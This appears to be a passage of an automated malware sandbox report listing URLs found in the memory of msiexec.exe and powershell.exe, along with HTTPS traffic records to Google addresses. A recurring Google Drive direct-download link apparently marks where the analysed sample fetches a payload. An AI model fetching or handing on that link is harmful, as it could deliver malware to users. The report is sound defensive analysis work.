00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/3x
      Source: msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
      Source: msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download#
      Source: msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download#J
      Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download%H
      Source: msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download)7
      Source: msiexec.exe, 00000008.00000003.3009836882.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3020546903.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download-
      Source: msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download0J
      Source: msiexec.exe, 00000008.00000003.3415424564.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230292643.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230195804.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415571327.0000000009A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadD
      Source: msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadH
      Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadIN
      Source: msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadR6
      Source: msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadY
      Source: msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloaddK
      Source: msiexec.exe, 00000008.00000003.3415424564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadgJ
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.00000000099ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3242165243.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321303005.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3219456047.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3393116568.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3196008939.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310503672.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230292643.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230195804.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3150159318.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3173324626.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310607658.0000000009A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.00000000099ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3242165243.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321303005.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3219456047.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3393116568.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3196008939.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310503672.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230292643.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230195804.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3150159318.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3173324626.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310607658.0000000009A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.00000000099ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3242165243.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321303005.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3219456047.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3393116568.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3196008939.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310503672.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230292643.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230195804.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3150159318.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3173324626.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310607658.0000000009A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2975909982.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3065994854.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184589261.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275808915.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3161486300.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3404833757.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356669707.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3265011212.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252986037.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2975909982.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3065994854.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184589261.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275808915.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3161486300.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3404833757.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356669707.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3265011212.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252986037.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2975909982.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3065994854.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184589261.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275808915.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3161486300.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3404833757.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356669707.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3265011212.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252986037.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49986 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49988 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49989 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49991 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49998 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50000 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50002 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50006 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50008 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50010 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50012 version: TLS 1.2
